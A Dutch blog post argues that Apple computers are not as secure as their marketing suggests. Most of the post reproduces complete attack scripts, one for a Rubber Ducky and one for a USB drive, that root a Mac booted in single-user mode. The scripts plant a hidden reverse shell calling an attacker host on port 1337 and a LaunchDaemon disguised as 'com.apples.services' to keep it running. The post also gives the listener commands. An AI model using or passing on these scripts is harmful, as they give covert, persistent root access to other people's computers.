IKBENSTIL BLOG | Opendoor Apple
1813
post-template-default,single,single-post,postid-1813,single-format-standard,ajax_leftright,page_not_loaded,

BLOG

 

Opendoor Apple

Standaard als wij het over computer beveiliging hebben krijgen wij emails waarin wij er op gewezen worden dat je dan toch beter een Apple gebruikt, want die zijn veilig. Maar helaas schijn bedriegd. Elke computer (pc, linux, routers, tablet, smartphone ezv.) is hack-baar en ook Apple computers (en tablets en smartphones) vallen inmiddels onder de aandacht van hackers. Juist de door de marketing opgebouwde schijnveiligheid is namelijk bijzonder gevaarlijk. Bizar is dan wel hoe kinderlijk eenvoudig het is om een Apple i-apparaat te hacken, en wel zo:

Men neme een USB stick of nog beter een Rubber Ducky:

The Rubber Ducky Method

rubber-ducky

1) Download the Ducky Decoder and Firmware from here.

Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware)

2) Create the script source.txt.

Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line.

source.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '
ENTER
STRING
ENTER
STRING Label
ENTER
STRING com.apples.services
ENTER
STRING ProgramArguments
ENTER
STRING
ENTER
STRING /bin/sh
ENTER
STRING /Library/.hidden/connect.sh
ENTER
STRING
ENTER
STRING RunAtLoad
ENTER
STRING
ENTER
STRING StartInterval
ENTER
STRING 60
ENTER
STRING AbandonProcessGroup
ENTER
STRING
ENTER
STRING
ENTER
STRING ' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER

3) Compile and install the script.

From within the ducky decoder folder, execute:

1
java -jar encoder.jar -i source.txt -o inject.bin -l us

Move your inject.bin over to the ducky.

4) Boot into single user mode (Command – S).

5) At the command prompt, plug in ducky.

6) Catch your shell.

Linux
1
nc -l -p 1337
OSX
1
nc -l 1337

Say hello! You are now root:

mac-hack

 

 

The USB Flash Drive Method

1) Create the file install.bash on a flash drive.

install.bash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/bin/bash
#Create the hidden directory /Library/.hidden
mkdir /Library/.hidden
#Copy the script to hidden folder
echo "
#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait" > /Library/.hidden/connect.sh
#Give the script permission to execute
chmod +x /Library/.hidden/connect.sh
#Create directory if it doesn't already exist.
mkdir /Library/LaunchDaemons
#Write the .plist to LaunchDaemons
echo '
Label
com.apples.services
ProgramArguments
/bin/sh
/Library/.hidden/connect.sh
RunAtLoad
StartInterval
60
AbandonProcessGroup
' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
#Load the LaunchAgent
launchctl load /Library/LaunchDaemons/com.apples.services.plist
shutdown -h now

2) Boot into single user mode (Command – S).

3) Execute the commands.

1
2
3
4
5
6
7
8
9
10
11
mount -uw /
mkdir /Volumes/usb
ls /dev
mount_msdos /dev/disk1s1 /Volumes/usb
cd /Volumes/usb
./install.bash

disk1s1 will change! If you’re not sure which device is your flash, take out your device, list devices, put your flash drive back in, and list devices. Your flash drive will be the device that has come and gone.

4) Catch your shell.

 

Binnen luttele seconden kun je dus root worden en het apparaat volledig vanaf een andere computer over nemen. Alleen omdat een bedrijf roept dat hun producten veilig zijn betekent dus niet dat dit ook zo is. Sterker nog deze open deur is al vrij lang bekend maar er is geen verandering in gebracht.

Nog meer info hier: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/.

Filmpje hier: https://www.youtube.com/watch?v=-ve_H-Ua6pQ

En mocht je denken dat dit wel het enige foutje is, hier staan er nog 113: https://exploits.shodan.io/?q=apple+platform%3A%22osx%22 en voor Ios: https://exploits.shodan.io/?q=ios+platform%3A%22hardware%22

 

 

 

 

 

 

TAGS > , , , ,